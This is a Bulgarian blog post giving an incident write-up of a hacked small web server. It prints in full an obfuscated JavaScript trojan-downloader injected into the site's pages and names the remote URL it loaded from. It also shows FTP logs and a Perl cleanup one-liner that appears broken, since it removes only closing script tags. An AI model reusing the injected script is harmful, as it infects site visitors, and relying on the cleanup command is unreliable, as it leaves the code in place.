Често задавани въпроси

Глупави въпроси няма, има само глупави отговори…

За ЧЗВ.нет

Идеята е да служи за хранилище на отговори на Често Задавани Въпроси. Като начало - основно в сферата на IT ( ИТ, Информационни Технологии... абе компютрите ), но ограничения няма да слагаме. Та ако не можете да намерите отговора на това, което живо ви интересува - питайте на vupros@chzv.net (опашката от чакащи отговори въпроси се намира на тук ) И за да не се заяждате за транслитерацията можете да изпращате и на vapros@chzv.net, vaprosi@chzv.net, question@chzv.net, faq@chzv.net...

Категории

Последни статии

Блогове

абонаменти

Хакнат

October 26th, 2007 от singu

Е, не chzv.net, а едно друго сървърче, на което стоят 2-3 сайта + отскоро и един TeamSpeak сървър.

Хронология на събитията:

- Получавам оплакване, че сървъра е “пълен с вируси”. Което технически няма как да е вярно - сървърчето се клати от Fedora, а както знаем, там вируси не виреят много-много.

- Поглеждам въпросната страница ( с Firefox под Windows ) и хоп - пренасочва ме към ya.ru. Както казват в някои среди WTF ?!?

Damage assessment/Поражения:

- отварям сорса на страницата, преди пренасочването и виждам следната малка сладка функцийка:

...

<script language=”JavaScript”>function sban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,11,37,34,6,59,58,31,19,3
3,0,0,0,0,0,0,27,36,25,30,26,13,9,57,43,22,55,46,56,35,47,60,53,16,28,14,52,51,0,40,24,49,17,0,0,0,0,61,0,62,5,3,12,38,15,2,8,
18,7,32,20,48,29,45,21,23,50,41,44,54,42,10,39,1,4);for(j=Math.ceil(l/b);j>0;j–){r=”;for(i=Math.min(l,b);i>0;i–,l–){w|=(t[
x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(172^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}sban(’QItrCJRmFULJC0
RAzMEuR@GkcuGJccdrc1XYgHOmc3_kdKnYhMEYZuFMzxRY18duZuFM7MnPVxRADqOJb5RYVqdup@FYbMdrF1tAQSXYw5nUyxtA’)</script><!– www.taifata.
be –></code>

<p id=”CUSTOM_HEADER”>

...

Мдааа… неприятно. Това малко сладко нещо се казва Trojan-downloader.js.agent.ko и ако човек е с Firefox, просто те праща на yandex, но ако си под IE, се опитва да стартира Microsoft Vector Rendering Add-on, заедно с нещо, което сваля от http://ls-networking.org/fresh01/index.php На въпросният адрес ни чака следната грешка:

Грешка

т.е. каквото го е имало, вече го няма. Гледайки пътищата на системата, това е Apache 1.3, работещо под Windows - явно стара и неподдържана система. Е, явно няма да разберем какво точно прави скрипта, но моето предположение е, че ползва ето този екплойт( или подобен).

Attack vector/Направление на атаката:

Както и да е, да се върнем към сървърчето и да видим откъде са влезли. Бърза проверка на опитите за влизане не показва нищо - обичайните опити за bruteforce през SSH и FTP, които много бързо се пресичат от SSHBlack ( силно препоръчвам !).

Проверка на лог файла на FTP сървъра показа, че на практика всички файлове с разширения html и php са били модифицирани:

Thu Oct 25 04:34:03 2007 1 81.177.4.34 3862 /themes/simplicity/template.html b _ o r taifata ftp 0 * c
Thu Oct 25 04:34:04 2007 1 81.177.4.34 3862 /themes/simplicity/template.html b _ i r taifata ftp 0 * c

По-наблюдателните, които са запознати с лог-формата на vsFTPd ще кажат, че всъщност точно това не е модификация и са прави - тук някой от адрес 81.177.4.34 е свалил файла template.html и след това го е качил със същият размер. Ако обаче се заровим малко по-нагоре, ще видим как файлът всъщност вече е бил променен ( увеличен с няколкостотин байта ) и тук явно зле написан бот сваля файла, опитва се да го модифицира, вижда, че файлът вече е заразен, в резултат на което не го променя допълнително и въпреки това качва файла отново. Доста неефективно и мърляшки, но какво да се прави…

Как са влязли в машината обаче ? Единственият начин, за който се сещам е, ако вече знаят паролата на този потребител. Системата има няколко потребителя и в другите акаунти няма проблем. От друга страна проверка на лог-файловете показва, че HTML и PHP файловете са били модифицирани няколкократно ?!? Чак тогава си спомних за случай от преди няколко месеца, когато единият от хората, които имаха FTP достъп до машината, се оплака, че е успял да се зарази с някакъв троянски кон. Тогава въпросния троянец се беше логнал и беше окепазил само основният index.php, но явно освен всичко останало е пратил потребителя и паролата на създателя си. Естествено след този случай никой не се погрижи да смени паролите… Е, сърбаме си попарата.

Protection/Защита от бъдещи атаки:

Просто - сменяме паролата и толкоз. Е, понеже съм в заядливо настроение - ще пусна мейлове и до администраторите на мрежите, откъдето са модифицирали файловете.

Cleanup/Възстановяване:

И така… имаме към 2000 файла, в които е нашлякан кофти код. Няма страшно - имаме си Perl:

find . -name *html -exec perl -pi -w -e 's/\<\/script\>//g;’ {} \;

и voila - всички html файлове са изчистени.

Споделяне: Тези икони са връзки към различни социални сайтове за споделяне на линкове
  • Digg
  • del.icio.us
  • Dao.bg
  • Ping.bg
  • Pipe.bg
  • Svejo.net
  • Web-BG

Публикувано в Сигурност |

Коментирайте

Внимание: Модерирането на коментари е включено и може да доведе до забавяне на публикуването на вашият коментар. Моля за търпение.